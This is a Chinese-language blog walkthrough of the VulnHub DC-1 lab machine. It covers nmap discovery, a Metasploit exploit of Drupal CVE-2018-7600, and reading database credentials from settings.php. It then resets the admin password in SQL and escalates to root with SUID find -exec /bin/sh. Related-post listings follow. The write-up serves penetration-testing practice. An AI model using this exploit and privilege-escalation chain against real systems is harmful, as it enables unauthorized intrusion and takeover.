VulnHub:DC-1学习笔记

最新推荐文章于 2022-07-03 18:07:57 发布
最新推荐文章于 2022-07-03 18:07:57 发布
阅读量149 收藏
点赞数
分类专栏: Kali Linux Vulnhub 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013536897/article/details/108610816
版权

下载地址:http://www.vulnhub.com/entry/dc-1,292/
官网描述翻译:
大概意思是一共有5个flag,不一定需要登录root用户但是需要有root权限?(应该就是提权吧)
在这里插入图片描述
下载好后解压后直接用VMware打开就行
这里把网络模式改为nat模式
在这里插入图片描述
开机
在这里插入图片描述
打开vm网络编辑器可以看到nat模式的主机都在192.168.13.0/24网段
在这里插入图片描述
由于不知道靶机的IP,这里需要使用kali中nmap来扫描一下同网段的存活主机。

nmap -T4 -A 192.168.13.0/24

在这里插入图片描述
这里可以看到192.168.13.146这个主机的应该就是靶机了。

用nmap扫描一下开放端口

nmap -T4 -p- 192.168.13.146

在这里插入图片描述

通过扫描结果可以得知:22、80、111、47037端口是开放的

浏览器中访问一下
在这里插入图片描述
这里推荐一个插件:Wappalyzer,可以识别网站的cms,服务器等
在这里插入图片描述
使用awvs扫描一下,安装步骤可以参考下https://www.sqlsec.com/2020/04/awvs.html
在这里插入图片描述
查看下扫描结果:
在这里插入图片描述
存在CVE-2018-7600,关于漏洞的原理的介绍:
https://xz.aliyun.com/t/2312

这里直接使用msf来利用此漏洞:
search drupal

在这里插入图片描述
use exploit/unix/webapp/drupal_drupalgeddon2
show options
在这里插入图片描述
设置一下ip然后直接exploit
在这里插入图片描述
查看一下当前目录下的文件
在这里插入图片描述
找到一个flag1.txt,查看一下里面内容
在这里插入图片描述
这里提示去寻找配置文件,查询得知drupal的配置文件在
在这里插入图片描述
cd sites/default
在这里插入图片描述
查看下settings.php内容
在这里插入图片描述

flag2提示:
爆破字典不是唯一攻击方式
‘username’ => ‘dbuser’,
‘password’ => ‘R0ck3t’,

使用python反弹shell
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
登录mysql数据库:
mysql -udbuser -pR0ck3t
在这里插入图片描述
查询数据库
show databases;
在这里插入图片描述
进入drupualdb库查看表

在这里插入图片描述
查询users表中的内容
select * from user\G;
在这里插入图片描述
admin的密码加密了,这里去重置一下密码吧

关于drupal密码重置:
http://drupalchina.cn/node/2128

切换到/var/www目录下执行:
php scripts/password-hash.sh admin
在这里插入图片描述

进入drupaldb库来重置密码

update users set pass="$S$DpKlE3tSXI/B/6xmTi9qaYd/CEpkG8BK0AK6ecGPrv1LW2pPgHD0" where name ="admin";

在这里插入图片描述
通过浏览器来登录admin用户
在这里插入图片描述
这里寻找到一个flag3
在这里插入图片描述
在这里插入图片描述
flag3提示的查看passwd,然后使用-exec提权

这里在passwd中发现了flag4用户
在这里插入图片描述

接下来就是提权了:
首先去寻找一个属于root的有s权限的文件:
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
这里使用find来提权:
touch test
find test -exec ‘/bin/sh’ ;
在这里插入图片描述
根据flag3的提示进入/home/flag4目录下内容
在这里插入图片描述
提示最后一个flag在root目录下,直接查看
在这里插入图片描述
至此,5个flag就全部拿到了。

总结一下这次的知识点:
nmap
awvs
msf漏洞利用
了解了drupal的一些基础知识
mysql基本命令
linux提权

MayF1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub DC-1 靶机
FourthGuy的博客
05-03 582
打开我们的kali linux 和 DC-1 靶机 信息收集 扫描靶机ip: arp-scan -l 查看网段的所有主机 由上图得到DC-1靶机ip为192.168.88.129 nmap端口扫描:接下来就要用我们的神器nmap了 (端口:如果我们把ip看成是一个房子,端口就是门,我们需要通过端口来从ip这里获取,传输数据) ...
内网渗透笔记——vulnhub内网结课渗透
wang_zui_zui的博客
03-14 697
准备步骤: 靶机:Beelzebub ip地址:192.168.111.136 攻击机:kali ip地址:192.168.111.130 Vmware下NAT模式连接 一、进行信息收集 1、使用nmap命令扫网段 发现目标ip——192.168.111.136 2、对目标ip进行详细的扫描 发现开放了22和80两个端口,考虑能不能通过爆破22号端口来取得shell? 3.尝试爆破 利用user&pass.txt字典,为了防止电脑跑烂掉选择admin,user等较常用
Vulnhub-DC6学习笔记
weixin_42820274的博客
07-03 219
Vulnhub-DC6学习笔记
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
Vulnhub系列_DC-3
weixin_41064688的博客
01-10 852
Vulnhub系列_DC-3 DC系列下载地址:https://download.vulnhub.com/dc/或http://www.five86.com/downloads.html 工具和漏洞: Netdiscover:进行网络发现 Nmap:端口扫描 Whatweb: 识别靶机网址使用的web服务、系统版本、CMS系统等 Joomscan: 扫描Joomla相关配置内容、检测已知漏洞等 S...
dc-sdk-examples:DC-SDK开发示例
05-11
在探索和学习"dc-sdk-examples"时,你可以逐个研究每个示例,理解其背后的代码逻辑,学习如何调用DC-SDK的API函数,并将其应用到自己的项目中。同时,也可以参考Cesium的官方文档,了解更多关于Cesium的功能和最佳...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-DC转换器数学模型:DC-DC转换器支持Buck、Boost、Buck-Boost转换器选择和闭环设计。-matlab开发
06-01
DC-DC转换器是电子工程领域中至关重要的组件,它用于改变直流电源的电压等级,以适应不同设备或系统的需求。在本项目中,我们关注的是利用MATLAB进行DC-DC转换器的数学建模,特别是Buck、Boost和Buck-Boost三种基本...
dc-chart:DC-Chart 是 DC-SDK 与 Echarts 融合的产品。主要用于在 3D 场景中添加 echart 的统计图表。将统计图表 Gis 化
05-06
直流图 | DC-Chart是dc-sdk和Echarts集成的产品。 主要用于向3D场景添加Echarts的统​​计图。 根据统计图表Tips:This SDK is JS+GIS framework package. Developers need to have some front-end technology and ...
dc-mapv:DC-Mapv 是 DC-SDK 与 百度 Mapv 融合的产品。主要用于在 3D 场景中展现大数据
05-06
DC-Mapv是与dc-sdk和百度Mapv集成的产品。 它主要用于在3D场景中显示大数据。 Tips:This SDK is JS+GIS framework package. Developers need to have some front-end technology and GIS related technology 安装 ...
靶机渗透-Vulnhub-DC-1
dahege666的博客
01-12 168
下载地址:链接:https://pan.baidu.com/s/1_oBtOEVSu2VaRpjmsKSh-Q 提取码:ugo5 靶机:DC1(VMware桥接) IP:192.168.88.115 攻击机:Kali(VMware桥接) IP:192.168..88.100 查看Kali IP地址 使用NMAP扫描网段,查看靶机IP地址,可以根据MAC地址判断哪个是靶机IP:192.168.88.115 然后使用nmap扫描靶机,进行信息收集,开发了22,80,111端...
vulnhubDC-1靶机
weixin_42298807的博客
10-10 175
一、靶机下载链接 https://www.vulnhub.com/entry/dc-1-1,292/ 二、主机发现 arp-scan -l 三、端口扫描 nmap -sT -p- -A 192.168.113.151 发现22、80、111、58019端口开放 四、以80端口作为突破口,浏览器访问 发现是一个登陆框,且是drupal cms 五、进入metasploit模块查找有没有可以利用的模...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7323
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
VulnHub DC-1 Writeup
末初的CSDN博客
09-28 411
DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 如果觉得速度慢了的话可以使用 arp-scan -l 发现目标靶机IP:192.1
vulnhub靶机DC-1
cyzCc的博客
02-15 908
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2982
Vulnhub靶机渗透学习——DC-9
Vulnhub Node:1 详解
StriveBen的博客
09-03 1304
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250 信息收集 arp-scan 用来发现系统和指纹识别的命令行工具。 从结果中可以看到node的ip是”192.168.92.129” 使用nmap对端口进行探测,如下图所示: 可知开放的端口有2个,分别是:22和3000,其中3000是个web服务; 详细banner信息...
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2438
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
VulhubDC-1
Lorezon的博客
04-13 338
发现DC实验室都挺好玩的,就拿来玩玩,顺便记录下。 扫描主机地址: 然后nmap扫描 看到有80端口,访问。 看到是Drupal,上神器msf。 有7个可用,经测试exploit/multi/http/drupal_drupageddon模块可以反弹meterpreter。 设置好options之后开始攻击。 之后信息收集一波。 权限不是root,需要提权。 进入shell模式吧。 ls一下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值